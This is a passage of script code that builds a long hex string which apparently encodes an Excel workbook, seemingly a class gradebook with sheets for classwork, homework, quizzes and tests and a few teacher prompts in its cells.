0000\"\r\nwD+=\"0000000000000000000000000000261002000b0051100800000100000000000034100000461\"\r\nwD+=\"00200010041101200000062010000e0030000820b000005060000331000004f101400020002\"\r\nwD+=\"002c000000ed020000b90c0000490c00001d101200000000000000000000000000000000000\"\r\nwD+=\"000331000002010080001aaaaaa010001006210120000000000010000000100000000000000\"\r\nwD+=\"ef001e101e000200030100000000000000000000000000000000000000000b004d005a00261\"\r\nwD+=\"002000900341000001d101200010000000000000000000000000000000000331000001f102a\"\r\nwD+=\"000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"00000001f011e101e0002000301000000000000000000000000000000000000000023004d00\"\r\nwD+=\"000021100200010007100c00000000000000ffff09004d00341000003510000032100400000\"\r\nwD+=\"003003310000007100c008080800000000000000017000a101000c0c0c00000000000010000\"\r\nwD+=\"0016004f0034100000141014000000000000000000000000000000000000000000331000001\"\r\nwD+=\"8100200010022100a0000000000000000000f0015101400150d00001a0600007a0200009101\"\r\nwD+=\"000003011f00331000004f10140005000200150d00001a06000000000000000000002510200\"\r\nwD+=\"00202010000000000eaffffffcbffffff0000000000000000b1004d0030090000331000004f\"\r\nwD+=\"101400020002000000000000000000000000000000000051100800000100000000000034100\"\r\nwD+=\"000341000003410000034100000251020000202010000000000a9060000540000004a020000\"\r\nwD+=\"e501000081004d0080300000331000004f101400020002000000000000000000860000002e0\"\r\nwD+=\"00000261002000a005110080000010000000000000d10180000000a0143006c006100730073\"\r\nwD+=\"0077006f0072006b00200027100600010000000000341000003410000000020e00000000000\"\r\nwD+=\"90000000000010000006510020002000402370000000000000017000163006c006100730073\"\r\nwD+=\"0077006f0072006b000a0038002e003600200038002e0037002000730068006500650074000\"\r\nwD+=\"4022f0001000000000013000163006c0061007300730077006f0072006b000a007700610072\"\r\nwD+=\"006d00750070002000230035000402350002000000000016000163006c00610073007300770\"\r\nwD+=\"06f0072006b000a0063006f006f006c00200064006f0077006e0020002300350004023d0003\"\r\nwD+=\"00000000001a000163006c0061007300730077006f0072006b000a007700650065006b006c0\"\r\nwD+=\"07900200072006500760069006500770020003100350004023d000400000000001a00016300\"\r\nwD+=\"6c0061007300730077006f0072006b000a007700650065006b006c007900200072006500760\"\r\nwD+=\"069006500770020003100360004023d000500000000001a000163006c006100730073007700\"\r\nwD+=\"6f0072006b000a007700650065006b006c00790020007200650076006900650077002000310\"\r\nwD+=\"034000402370006000000000017000163006c0061007300730077006f0072006b000a005400\"\r\nwD+=\"72006900670020005400770069007300740065007200200004023d000700000000001a00016\"\r\nwD+=\"3006c0061007300730077006f0072006b000a007700650065006b006c007900200072006500\"\r\nwD+=\"76006900650077002000310037000402350008000000000016000163006c006100730073007\"\r\nwD+=\"7006f0072006b000a006c006f0063007500730020007000610063006b006500740065100200\"\r\nwD+=\"010003020e000000000000000000000000004b4003020e00010000000000000000000000344\"\r\nwD+=\"003020e00020000000000000000000000494003020e00030000000000cdcccccccccc574003\"\r\nwD+=\"020e00040000000000000000000000344003020e00050000000000000000000000594003020\"\r\nwD+=\"e00060000000000000000000000544003020e00070000000000000000000000000003020e00\"\r\nwD+=\"08000000000000000000008056406510020003000a000000ec0066000f0004f066000000a20\"\r\nwD+=\"c0af00800000003040000000a000063000bf0240000008000784a36018b0002000000bf0008\"\r\nwD+=\"000800810141000008c0010c000008ff0108000800000010f01200000000000800d2001600a\"\r\nwD+=\"6000c0010001f00d300000011f0000000005d001a0015001200060003001160784a3601d413\"\r\nwD+=\"92010000000000000000ec00080000000df000000000b601120012020000000000000000260\"\r\nwD+=\"01000000000003c00270000576861742074797065206f66206772617068206c6f6f6b732062\"\r\nwD+=\"65737420616e64207768793f3c00100000001200e90011002600000000000000ec009c000f0\"\r\nwD+=\"004f09c00000002030af00800000004040000000a0000f3000bf05a0000008000c84a360185\"\r\nwD+=\"00010000008b0002000000bf0008000a0047011ca8ffff4801fb340000490125ccffff4a01c\"\r\nwD+=\"60b00004c01c60b00004d011ca8ffff4e01fb340000810141000008c0010c000008ff010800\"\r\nwD+=\"08007f0304000c00000010f01200000000000a0070010100e2000b0070031000f100000011f\"\r\nwD+=\"0000000005d001a00150012001e0004001160c84a3601e01492010000000000000000ec0008\"\r\nwD+=\"0000000df000000000b60112001202000000000000000024001000000000003c00250000225\"\r\nwD+=\"041535445205350454349414c22202d2d56414c55455320414e4420464f524d4154533c0010\"\r\nwD+=\"0000001200120111002400000000000000ec0018001f0005f010000000000017f0080000000\"\r\nwD+=\"2000000040400003e021200b600100000004000000000000000000000001d000f0003040003\"\r\nwD+=\"0000000100040004000303ef000600050037000000670817006708000000000000000000000\"\r\nwD+=\"20001ffffffff004000000a0000000908100000061000e228cd07c9c00000060200000b0218\"\r\nwD+=\"0000000000010000002b0000005b4000007e4d0000004e00000d00020001000c00020064000\"\r\nwD+=\"f000200010011000200000010000800fca9f1d24d62503f5f00020001002a00020000002b00\"\r\nwD+=\"02000000820002000100800008000000000000000000250204000000ff0081000200c104140\"\r\nwD+=\"0000015000000830002000000840002000000a10022000000ff000100010001000400020001\"\r\nwD+=\"ff000000000000e03f000000000000e03f524d120002000100dd00020001006300020001005\"\r\nwD+=\"500020008007d000c0000000000241b0f00020004007d000c00010001006d130f0003000400\"\r\nwD+=\"7d000c0008000800b60a0f00060004009b0000009d00020001009e002100000004000602c85\"\r\nwD+=\"a3601080100000000000000000000000000686f6d65776f726b00020e00010000002b000000\"\r\nwD+=\"00000f00000008021000010000000900ff000000000000010f0008021000020000000900ff0\"\r\nwD+=\"00000000020010f0008021000030000000900ff000000000000010f00080210000400000009\"\r\nwD+=\"00ff000000000020010f0008021000050000000900ff000000000020010f000802100006000\"\r\nwD+=\"0000900ff000000000000010f0008021000070000000900ff000000000000010f0008021000\"\r\nwD+=\"080000000900ff000000000020010f0008021000090000000900ff000000000020010f00080\"\r\nwD+=\"210000a0000000900ff000000000020010f00080210000b0000000900ff000000000020010f\"\r\nwD+=\"00080210000c0000000900ff000000000000010f00080210000d0000000900ff00000000002\"\r\nwD+=\"0010f00080210000e0000000900ff000000000020010f00080210000f0000000900ff000000\"\r\nwD+=\"000020010f0008021000100000000a00ff000000000020010f0008021000110000000a00ff0\"\r\nwD+=\"00000000020010f0008021000120000000a00ff000000000000010f0008021000130000000a\"\r\nwD+=\"00ff000000000000010f0008021000140000000a00ff000000000000010f000802100015000\"\r\nwD+=\"0000a00ff000000000020010f0008021000160000000a00ff000000000020010f0008021000\"\r\nwD+=\"170000000a00ff000000000000010f0008021000180000000a00ff000000000000010f00080\"\r\nwD+=\"21000190000000a00ff000000000020010f00080210001a0000000a00ff000000000020010f\"\r\nwD+=\"00080210001b0000000a00ff000000000020010f00080210001c0000000a00ff00000000000\"\r\nwD+=\"0010f00080210001d0000000a00ff000000000020010f00080210001e0000000a00ff000000\"\r\nwD+=\"000000010f00080210001f0000000a00ff000000000020010f00fd000a00010000000f00000\"\r\nwD+=\"00000fd000a00010001000f0001000000fd000a00010002000f0002000000fd000a00010003\"\r\nwD+=\"000f0047000000fd000a00010004000f0032000000fd000a00010005000f004c000000fd000\"\r\nwD+=\"a00010006000f004d000000fd000a00010007000f004e000000fd000a00020000000f002100\"\r\nwD+=\"0000fd000a00020001000f00220000007e020a00020002000f000000594003020e000200080\"\r\nwD+=\"01700577cc5577cc53240fd000a00030000000f0003000000fd000a00030001000f00090000\"\r\nwD+=\"007e020a00030002000f0000405940060051000300030026003c25c85382fc50400000a8073\"\r\nwD+=\"7fd3b0024030002c024060002c024070002c0240c0002c024120002c024130002c024140002\"\r\nwD+=\"c024170002c024180002c0241c0002c0241e0002c0420b050006005a000300040025009a999\"\r\nwD+=\"99999d953400000130008ff440024030002c024060002c0250600070002c002c024060002c0\"\r\nwD+=\"240c0002c024130002c024120002c024140002c024170002c024180002c0241c0002c0241e0\"\r\nwD+=\"002c0420ce30006005100030005002500a3554c5ac5949f400000030004ff3b0024030002c0\"\r\nwD+=\"24060002c024070002c0240c0002c024120002c024130002c024140002c024170002c024180\"\r\nwD+=\"002c0241c0002c0241e0002c0420b2e000600510003000600250040bc8129957a4640000003\"\r\nwD+=\"0005ff3b0024030002c024060002c024070002c0240c0002c024130002c024120002c024140\"\r\nwD+=\"002c024170002c024180002c0241c0002c0241e0002c0420b0c00060028000300070025008a\"\r\nwD+=\"ddf0a40f87e73f0000030006ff120044030002c044030003c0041544030006c006fd000a000\"\r\nwD+=\"30008001c0029000000fd000a00040000000f0004000000fd000a00040001000f000a000000\"\r\nwD+=\"7e020a00040002000f000000594003020e00040008001d0014b742712b145140fd000a00050\"\r\nwD+=\"000000f0005000000fd000a00050001000f000b0000007e020a00050002000f0000004940fd\"\r\nwD+=\"000a00050008001c0029000000fd000a00060000000f0006000000fd000a00060001000f000\"\r\nwD+=\"9000000bd001200060002000f0000c050400f0000005140030003020e00060006000f004304\"\r\nwD+=\"1c42957a464006002800060007000f0037f4c8e6e7c696bf0000030007ff120044060002c04\"\r\nwD+=\"4060003c0041544060006c0067e020a00060008001d0000805140fd000a00070000000f0007\"\r\nwD+=\"000000fd000a00070001000f0009000000bd001200070002000f000104bf400f00000051400\"\r\nwD+=\"30003020e00070006000f0043041c42957a464006002800070007000f006994d53a853ad03f\"\r\nwD+=\"0000060007ff120044070002c044070003c0041544070006c006fd000a00080000000f00080\"\r\nwD+=\"00000fd000a00080001000f000c0000007e020a00080002000f0000004940fd000a00090000\"\r\nwD+=\"000f000d000000fd000a00090001000f000b0000007e020a00090002000f0000005440fd000\"\r\nwD+=\"a000a0000000f000e000000fd000a000a0001000f000c0000007e020a000a0002000f000080\"\r\nwD+=\"5140fd000a000b0000000f0011000000fd000a000b0001000f000b0000007e020a000b00020\"\r\nwD+=\"00f0000005940fd000a000c0000000f000f000000fd000a000c0001000f0009000000bd0012\"\r\nwD+=\"000c0002000f00000059400f0000005140030003020e000c0006000f0043041c42957a46400\"\r\nwD+=\"60028000c0007000f0037f4c8e6e7c6e63f0000070007ff1200440c0002c0440c0003c00415\"\r\nwD+=\"440c0006c006fd000a000d0000000f0023000000fd000a000d0001000f000a0000007e020a0\"\r\nwD+=\"00d0002000f0000003440fd000a000e0000000f0010000000fd000a000e0001000f000a0000\"\r\nwD+=\"007e020a000e0002000f0000004940fd000a000f0000000f0012000000fd000a000f0001000\"\r\nwD+=\"f000a0000007e020a000f0002000f0000004940fd000a00100000000f0013000000fd000a00\"\r\nwD+=\"100001000f000a0000007e020a00100002000f0000003440fd000a00110000000f001400000\"\r\nwD+=\"0fd000a00110001000f000c0000007e020a00110002000f0000c05240fd000a00120000000f\"\r\nwD+=\"0015000000fd000a00120001000f0009000000bd001200120002000f00000059400f0000005\"\r\nwD+=\"140030003020e00120006000f0043041c42957a464006002800120007000f0037f4c8e6e7c6\"\r\nwD+=\"e63f00000c0007ff120044120002c044120003c0041544120006c006fd000a0012000800200\"\r\nwD+=\"026000000fd000a001200090020002a000000fd000a00130000000f0016000000fd000a0013\"\r\nwD+=\"0001000f0009000000bd001200130002000f00000000000f0000005140030003020e0013000\"\r\nwD+=\"6000f0043041c42957a464006002800130007000f007a8335655633f8bf0000120007ff1200\"\r\nwD+=\"44130002c044130003c0041544130006c006060023001300080027006766666666663440000\"\r\nwD+=\"0030003ff0d001fc3f5285c8fc2e53f1e1e00057e020a0013000900200000003e40fd000a00\"\r\nwD+=\"140000000f0017000000fd000a00140001000f0009000000bd001200140002000f000000000\"\r\nwD+=\"00f0000005140030003020e00140006000f0043041c42957a464006002800140007000f007a\"\r\nwD+=\"8335655633f8bf0000130007ff120044140002c044140003c0041544140006c006fd000a001\"\r\nwD+=\"50000000f0018000000fd000a00150001000f000a0000007e020a00150002000f0000005940\"\r\nwD+=\"fd000a00160000000f0019000000fd000a00160001000f000a0000007e020a00160002000f0\"\r\nwD+=\"000005440fd000a00170000000f001a000000fd000a00170001000f0009000000bd00120017\"\r\nwD+=\"0002000f00000059400f0000005140030003020e00170006000f0043041c42957a464006002\"\r\nwD+=\"800170007000f0037f4c8e6e7c6e63f0000140007ff120044170002c044170003c004154417\"\r\nwD+=\"0006c006fd000a00180000000f001b000000fd000a00180001000f0009000000bd001200180\"\r\nwD+=\"002000f00000000000f0000005140030003020e00180006000f0043041c42957a4640060028\"\r\nwD+=\"00180007000f007a8335655633f8bf0000170007ff120044180002c044180003c0041544180\"\r\nwD+=\"006c006fd000a00190000000f001c000000fd000a00190001000f000a0000007e020a001900\"\r\nwD+=\"02000f0000000000fd000a001a0000000f001d000000fd000a001a0001000f000c0000007e0\"\r\nwD+=\"20a001a0002000f0000005440fd000a001b0000000f001d000000fd000a001b0001000f000c\"\r\nwD+=\"0000007e020a001b0002000f0000005440fd000a001c0000000f001e000000fd000a001c000\"\r\nwD+=\"1000f0009000000bd0012001c0002000f00000059400f0000005140030003020e001c000600\"\r\nwD+=\"0f0043041c42957a4640060028001c0007000f0037f4c8e6e7c6e63f0000180007ff1200441\"\r\nwD+=\"c0002c0441c0003c00415441c0006c006fd000a001d0000000f001f000000fd000a001d0001\"\r\nwD+=\"000f000b0000007e020a001d0002000f0000004440fd000a001e0000000f0020000000fd000\"\r\nwD+=\"a001e0001000f0009000000bd0012001e0002000f00000059400f0000005140030003020e00\"\r\nwD+=\"1e0006000f0043041c42957a4640060028001e0007000f0037f4c8e6e7c6e63f00001c0007f\"\r\nwD+=\"e1200441e0002c0441e0003c00415441e0006c006fd000a001f0000000f001e000000fd000a\"\r\nwD+=\"001f0001000f000a0000007e020a001f0002000f0000805640d7004200ac0c0000580270003\"\r\nwD+=\"c00c1013c0038007e0070002a002a002a002a0070002a002a002a002a002a008c00a5007000\"\r\nwD+=\"2a002a00700070002a002a002a0070002a0070000802100029000e000f00ff0000000000000\"\r\nwD+=\"10f00080210002a000e000f00ff000000000000010f000102060029000e001700010206002a\"\r\nwD+=\"000e001700d70008003c00000014000a00c2011800110003000100090803000080040013000\"\r\nwD+=\"2000903080007feec00aa000f0002f014010000300008f00800000003000000030800000f00\"\r\nwD+=\"03f0fc0000000f0004f028000000010009f0100000000000000000000000000000000000000\"\r\nwD+=\"002000af00800000000080000050000000f0004f052000000920c0af0080000000108000000\"\r\nwD+=\"0a000043000bf0180000007f0004010401bf0008000800ff0100000800bf030000020000001\"\r\nwD+=\"0f012000000010001000000010000000200000002000000000011f0000000005d0046001500\"\r\nwD+=\"120014000100012100000000ac199201000000000c001400000000000000000000000100080\"\r\nwD+=\"00000100000001300ee1f000008000500010300000a001400570000000000ec0072000f0004\"\r\nwD+=\"f06a000000920c0af00800000003080000000a000083000bf0300000007f0004010401bf000\"\r\nwD+=\"800080081014e00000883014d000008bf0110001000c0014d000008ff01080008003f020000\"\r\nwD+=\"0200000010f0120000000000000097002200c4000d00b0013b009700000011f0000000005d0\"\r\nwD+=\"01a001500120005000300116000000000781a920100000000000000000908100000062000e2\"\r\nwD+=\"28cd07c9c00000060200001400000015000000830002000000840002000000a100220000001\"\r\nwD+=\"20001000100010004000000781a000000000000e03f000000000000e03f7f00330002000300\"\r\nwD+=\"60100a004c1d4812dc0001000c0060100a008115e60ac80000000d0060100a008115e60ac80\"\r\nwD+=\"001000e00120002000100011002000000021010000000000000000000e8bfa60200403d0133\"\r\nwD+=\"100000a00004000100010064100800000001000000010032100400000002003310000007100\"\r\nwD+=\"c00000000000000ffff09004d000a101000ffffff0000000000010001004e004d0034100000\"\r\nwD+=\"03100c00030001000b000b00010000003310000051100f0000020000000007003a010001000\"\r\nwD+=\"2000d100e000000050147005200410044004500511013000102000000000b003b010002001e\"\r\nwD+=\"0002000200511013000202000000000b003b010002001e00000001005110080003010000000\"\r\nwD+=\"0000006100800ffff000000000000331000005f100200000034100000451002000000341000\"\r\nwD+=\"00441004001a000000241002000200251020000202010000000000eaffffffd0ffffff00000\"\r\nwD+=\"00000000000b1004d00103d0000331000004f10140002000200000000000000000000000000\"\r\nwD+=\"00000000261002000d005110080000010000000000003410000024100200030025102000020\"\r\nwD+=\"2010000000000eaffffffd0ffffff0000000000000000b1004d00103d0000331000004f1014\"\r\nwD+=\"000200020000000000000000000000000000000000261002000e00511008000001000000000\"\r\nwD+=\"00034100000461002000100411012000000a3020000f9030000200a0000bb04000033100000\"\r\nwD+=\"4f101400020002002d000000fb020000960c0000440c00001d1012000000000000000000000\"\r\nwD+=\"000000000000000003310000020100800010001000100010062101200000000000100000001\"\r\nwD+=\"00000000000000ef001e101e000200030100000000000000000000000000000000000000000\"\r\nwD+=\"3004d002900261002000c00341000001d101200010000000000000000000000000000000000\"\r\nwD+=\"331000001f102a0000000000000000000000000000000000000000000000000000000000000\"\r\nwD+=\"0000000000000000000001f011e101e00020003010000000000000000000000000000000000\"\r\nwD+=\"00000023004d00000021100200010007100c00000000000000ffff09004d003410000035100\"\r\nwD+=\"00032100400000003003310000007100c008080800000000000000017000a101000c0c0c000\"\r\nwD+=\"000000000100000016004f00341000001410140000000000000000000000000000000000000\"\r\nwD+=\"00000331000001710060000009600000022100a0000000000000000000f0015101400f40c00\"\r\nwD+=\"00b20600009a0200009701000003011f00331000004f10140005000200f40c0000af0600000\"\r\nwD+=\"000000000000000251020000202010000000000eaffffffd0ffffff0000000000000000b100\"\r\nwD+=\"4d0030090000331000004f10140002000200000000000000000000000000000000005110080\"\r\nwD+=\"000010000000000003410000034100000341000003410000025102000020201000000000095\"\r\nwD+=\"0600006b000000a3020000f801000081004d008a300000331000004f1014000200020018000\"\r\nwD+=\"0001a0000009700000034000000261002000d005110080000010000000000000d1014000000\"\r\nwD+=\"080148006f006d00650077006f0072006b00271006000100000000003410000034100000000\"\r\nwD+=\"20e00000000000b000000000001000000651002000200040235000000000000001600013100\"\r\nwD+=\"2f00320039002c00200033003000200050002e0020003400390032002c00200050002000350\"\r\nwD+=\"03000320004022f0001000000000013000131002f0033003100200032002f00310020004300\"\r\nwD+=\"68002000540065007300740020004100200004022d0002000000000012000132002f0031002\"\r\nwD+=\"c003200200070002e00200035003100360020002d0020003500310038000402270003000000\"\r\nwD+=\"00000f0001700072006f006a0065006300740020006f00750074006c0069006e00650004023\"\r\nwD+=\"10004000000000014000132002f0036002c0020003700200070002e00200037003900390020\"\r\nwD+=\"00230031002d003200350020000402290005000000000010000170002e00200035003300310\"\r\nwD+=\"02000350033003800200032002f0038002c0039000402370006000000000017000139002e00\"\r\nwD+=\"3300200039002e00340020007000790074006800610067006f007200650061006e002000740\"\r\nwD+=\"068006d0004022f0007000000000013000132002f00320037002c003200380020004d006100\"\r\nwD+=\"7400680020004100200074006500730074000402330008000000000015000133002f0031002\"\r\nwD+=\"c003200200077006b007300680074002000310030002e0031002f00310030002e0036000402\"\r\nwD+=\"21000900000000000c00016c006f0063007500730020007000610063006b006500740004024\"\r\nwD+=\"7000a00000000001f000133002f0037002c0038002000310031002e00310020006e006f0074\"\r\nwD+=\"0065007300200061006e0064002000700072006100630020004100200073006800740065100\"\r\nwD+=\"200010003020e00000000000000000000000040594003020e000100000000000000000000c0\"\r\nwD+=\"504003020e000200000000009a99999999d9534003020e00030000000000000000000000594\"\r\nwD+=\"003020e00040000000000000000000000594003020e00050000000000000000000000000003\"\r\nwD+=\"020e00060000000000000000000000000003020e00070000000000000000000000594003020\"\r\nwD+=\"e00080000000000000000000000000003020e00090000000000000000000000594003020e00\"\r\nwD+=\"0a000000000000000000000059406510020003000a0000003e021200b600030000004000000\"\r\nwD+=\"000000000000000001d000f00030300030000000100030003000303ef000600050037000000\"\r\nwD+=\"67081700670800000000000000000000020001ffffffff004000000a0000000908100000061\"\r\nwD+=\"000e228cd07c9c00000060200000b021800000000000100000025000000d05800004d610000\"\r\nwD+=\"076200000d00020001000c00020064000f000200010011000200000010000800fca9f1d24d6\"\r\nwD+=\"2503f5f00020001002a00020000002b00020000008200020001008000080000000000000000\"\r\nwD+=\"00250204000000ff0081000200c1041400000015000000830002000000840002000000a1002\"\r\nwD+=\"2000000ff000100010001000400020001ff000000000000e03f000000000000e03f006f5500\"\r\nwD+=\"020008007d000c0000000000db1f0f00020004007d000c00010001006d0b0f00020004009b0\"\r\nwD+=\"000009d00020001009e001d00000004000602d85a3601040100000000000000000000000000\"\r\nwD+=\"7175697a00020e00010000002500000000000900000008021000010000000900ff000000000\"\r\nwD+=\"000010f0008021000020000000900ff000000000020010f0008021000030000000900ff0000\"\r\nwD+=\"00000020010f0008021000040000000900ff000000000020010f0008021000050000000900f\"\r\nwD+=\"f000000000000010f0008021000060000000900ff000000000020010f000802100007000000\"\r\nwD+=\"0900ff000000000020010f0008021000080000000900ff000000000020010f0008021000090\"\r\nwD+=\"000000900ff000000000000010f00080210000a0000000900ff000000000020010f00080210\"\r\nwD+=\"000b0000000900ff000000000000010f00080210000c0000000900ff000000000020010f000\"\r\nwD+=\"80210000d0000000900ff000000000020010f00080210000e0000000900ff00000000002001\"\r\nwD+=\"0f00080210000f0000000900ff000000000020010f0008021000100000000300ff000000000\"\r\nwD+=\"020010f0008021000110000000300ff000000000020010f0008021000120000000300ff0000\"\r\nwD+=\"00000020010f0008021000130000000300ff000000000020010f0008021000140000000300f\"\r\nwD+=\"f000000000020010f0008021000150000000300ff000000000020010f000802100016000000\"\r\nwD+=\"0300ff000000000020010f0008021000170000000300ff000000000020010f0008021000180\"\r\nwD+=\"000000300ff000000000020010f0008021000190000000300ff000000000020010f00080210\"\r\nwD+=\"001a0000000300ff000000000020010f00080210001b0000000300ff000000000020010f000\"\r\nwD+=\"80210001c0000000300ff000000000020010f00080210001d0000000300ff00000000000001\"\r\nwD+=\"0f00080210001e0000000300ff000000000020010f00080210001f0000000300ff000000000\"\r\nwD+=\"020010f00fd000a00010000000f0000000000fd000a00010001000f0001000000fd000a0001\"\r\nwD+=\"0002000f0002000000fd000a00010003000f0047000000fd000a00010004000f0032000000f\"\r\nwD+=\"d000a00010005000f0048000000fd000a00010006000f004d000000fd000a00010007000f00\"\r\nwD+=\"4e000000fd000a00010008000f0029000000fd000a00020000000f0021000000fd000a00020\"\r\nwD+=\"001000f00220000007e020a00020002000f0000005940fd000a00030000000f0003000000fd\"\r\nwD+=\"000a00030001000f00090000007e020a00030002000f0000005940fd000a00040000000f000\"\r\nwD+=\"4000000fd000a00040001000f000a0000007e020a00040002000f0000005940fd000a000500\"\r\nwD+=\"00000f0005000000fd000a00050001000f000b0000007e020a00050002000f0000004940060\"\r\nwD+=\"02e00050003000f000000000000e050400000b80b37fc180024050002c024090002c0240b00\"\r\nwD+=\"02c0241d0002c042040500fd000a00060000000f0006000000fd000a00060001000f0009000\"\r\nwD+=\"0007e020a00060002000f0000c0504003020e0006000700170014b742712b145140fd000a00\"\r\nwD+=\"070000000f0007000000fd000a00070001000f00090000007e020a00070002000f000000444\"\r\nwD+=\"0fd000a00080000000f0008000000fd000a00080001000f000c0000007e020a00080002000f\"\r\nwD+=\"0000004940fd000a00090000000f000d000000fd000a00090001000f000b0000007e020a000\"\r\nwD+=\"90002000f0000005440fd000a000a0000000f000e000000fd000a000a0001000f000c000000\"\r\nwD+=\"7e020a000a0002000f0000805140fd000a000b0000000f0011000000fd000a000b0001000f0\"\r\nwD+=\"00b0000007e020a000b0002000f0000005940fd000a000c0000000f000f000000fd000a000c\"\r\nwD+=\"0001000f00090000007e020a000c0002000f0000005940fd000a000d0000000f0023000000f\"\r\nwD+=\"d000a000d0001000f000a0000007e020a000d0002000f0000003440fd000a000e0000000f00\"\r\nwD+=\"10000000fd000a000e0001000f000a0000007e020a000e0002000f0000004940fd000a000f0\"\r\nwD+=\"000000f0012000000fd000a000f0001000f000a0000007e020a000f0002000f0000004940fd\"\r\nwD+=\"000a00100000000f0013000000fd000a00100001000f000a0000007e020a00100002000f000\"\r\nwD+=\"0003440fd000a00110000000f0014000000fd000a00110001000f000c0000007e020a001100\"\r\nwD+=\"02000f0000c05240fd000a00120000000f0015000000fd000a00120001000f00090000007e0\"\r\nwD+=\"20a00120002000f0000005940fd000a00130000000f0016000000fd000a00130001000f0009\"\r\nwD+=\"0000007e020a00130002000f0000000000fd000a00140000000f0017000000fd000a0014000\"\r\nwD+=\"1000f00090000007e020a00140002000f0000000000fd000a00150000000f0018000000fd00\"\r\nwD+=\"0a00150001000f000a0000007e020a00150002000f0000005940fd000a00160000000f00190\"\r\nwD+=\"00000fd000a00160001000f000a0000007e020a00160002000f0000005440fd000a00170000\"\r\nwD+=\"000f001a000000fd000a00170001000f00090000007e020a00170002000f0000005940fd000\"\r\nwD+=\"a00180000000f001b000000fd000a00180001000f00090000007e020a00180002000f000000\"\r\nwD+=\"0000fd000a00190000000f001c000000fd000a00190001000f000a0000007e020a001900020\"\r\nwD+=\"00f0000000000fd000a001a0000000f001d000000fd000a001a0001000f000c0000007e020a\"\r\nwD+=\"001a0002000f0000005440fd000a001b0000000f001d000000fd000a001b0001000f000c000\"\r\nwD+=\"0007e020a001b0002000f0000005440fd000a001c0000000f001e000000fd000a001c000100\"\r\nwD+=\"0f00090000007e020a001c0002000f0000005940fd000a001d0000000f001f000000fd000a0\"\r\nwD+=\"01d0001000f000b0000007e020a001d0002000f0000004440fd000a001e0000000f00200000\"\r\nwD+=\"00fd000a001e0001000f00090000007e020a001e0002000f0000005940fd000a001f0000000\"\r\nwD+=\"f001e000000fd000a001f0001000f000a0000007e020a001f0002000f0000805640d7004200\"\r\nwD+=\"1a08000058027e002a002a002a005c003c002a002a002a002a002a002a002a002a002a002a0\"\r\nwD+=\"02a002a002a002a002a002a002a002a002a002a002a002a002a002a00080210002200000007\"\r\nwD+=\"00ff000000000000010f0008021000230000000700ff000000000000010f000802100024000\"\r\nwD+=\"0000700ff000000000000010f00fd000a00220002000f0037000000fd000a00220006000f00\"\r\nwD+=\"2a0000007e020a00230006000f0000003440fd000a0024000000210038000000d7000a00740\"\r\nwD+=\"0000028001c000e00c2010c00030005000300090303003800ec00aa000f0002f03a01000040\"\r\nwD+=\"0008f00800000003000000020c00000f0003f00a0100000f0004f028000000010009f010000\"\r\nwD+=\"0000000000000000000000000000000000002000af008000000000c0000050000000f0004f0\"\r\nwD+=\"52000000920c0af008000000010c0000000a000043000bf0180000007f0004010401bf00080\"\r\nwD+=\"00800ff0100000800bf0300000200000010f012000000010001000000010000000200000002\"\r\nwD+=\"000000000011f0000000005d0046001500120014000100012100000000441d9201000000000\"\r\nwD+=\"c00140000000000000000000000010008000000100000001300ee1f00000800070001030000\"\r\nwD+=\"0a001400570000000000ec0078000f0004f078000000f2030af008000000020c0000000a000\"\r\nwD+=\"093000bf0360000008000a86e36018500010000008b0002000000bf0008000a004701ae5900\"\r\nwD+=\"004801cffaffff810141000008c001400000087f0300000c00000010f012000000000000005\"\r\nwD+=\"2032300d300020090022700a600000011f0000000005d001a00150012001e0002001160a86e\"\r\nwD+=\"3601a01d92010000000000000000ec00080000000df000000000b6011200120200000000000\"\r\nwD+=\"0000022001000000000003c00230000496e73657274207765696768746564207175697a2061\"\r\nwD+=\"76657261676520686572652e3c00100000001100c400110022000000ac9c3400ec0018001f0\"\r\nwD+=\"005f010000000000017f00800000002000000020c00003e021200b600000000004000000000\"\r\nwD+=\"000000000000001d000f00032700050000000100270027000505ef0006000500370000000a0\"\r\nwD+=\"000000908100000061000e228cd07c9c00000060200000b0218000000000001000000270000\"\r\nwD+=\"0027650000896d00005f6e00000d00020001000c00020064000f00020001001100020000001\"\r\nwD+=\"0000800fca9f1d24d62503f5f00020001002a00020000002b00020000008200020001008000\"\r\nwD+=\"08000000000000000000250204000000ff0081000200c104140000001500000083000200000\"\r\nwD+=\"0840002000000a10022000000ff00010001000100040100050505000000000000e03f000000\"\r\nwD+=\"000000e03f72655500020008007d000c0000000000db1f0f00020004017d000c00010001006\"\r\nwD+=\"d0b0f00020004019b0000009d00020001009e001d00000004000602046e3601040100000000\"\r\nwD+=\"0000000000000000007465737400020e0001000000270000000000080000000802100001000\"\r\nwD+=\"0000800ff000000000000010f0008021000020000000800ff000000000020010f0008021000\"\r\nwD+=\"030000000800ff000000000020010f0008021000040000000800ff000000000020010f00080\"\r\nwD+=\"21000050000000800ff000000000020010f0008021000060000000800ff000000000020010f\"\r\nwD+=\"0008021000070000000800ff000000000020010f0008021000080000000800ff00000000000\"\r\nwD+=\"0010f0008021000090000000800ff000000000020010f00080210000a0000000800ff000000\"\r\nwD+=\"000000010f00080210000b0000000800ff000000000020010f00080210000c0000000800ff0\"\r\nwD+=\"00000000020010f00080210000d0000000800ff000000000020010f00080210000e00000008\"\r\nwD+=\"00ff000000000020010f00080210000f0000000800ff000000000020010f000802100010000\"\r\nwD+=\"0000300ff000000000020010f0008021000110000000300ff000000000000010f0008021000\"\r\nwD+=\"120000000300ff000000000020010f0008021000130000000300ff000000000020010f00080\"\r\nwD+=\"21000140000000300ff000000000020010f0008021000150000000300ff000000000020010f\"\r\nwD+=\"0008021000160000000300ff000000000020010f0008021000170000000300ff00000000002\"\r\nwD+=\"0010f0008021000180000000300ff000000000020010f0008021000190000000300ff000000\"\r\nwD+=\"000020010f00080210001a0000000300ff000000000000010f00080210001b0000000300ff0\"\r\nwD+=\"00000000000010f00080210001c0000000300ff000000000020010f00080210001d00000003\"\r\nwD+=\"00ff000000000020010f00080210001e0000000300ff000000000020010f00080210001f000\"\r\nwD+=\"0000300ff000000000020010f00fd000a00010000000f0000000000fd000a00010001000f00\"\r\nwD+=\"01000000fd000a00010002000f0002000000fd000a00010003000f0047000000fd000a00010\"\r\nwD+=\"004000f004f000000fd000a00010005000f0048000000fd000a00010006000f004d000000fd\"\r\nwD+=\"000a00010007000f004e000000fd000a00020000000f0021000000fd000a00020001000f002\"\r\nwD+=\"20000007e020a00020002000f0000005940fd000a00030000000f0003000000fd000a000300\"\r\nwD+=\"01000f00090000007e020a00030002000f0000005940fd000a00040000000f0004000000fd0\"\r\nwD+=\"00a00040001000f000a0000007e020a00040002000f0000005940fd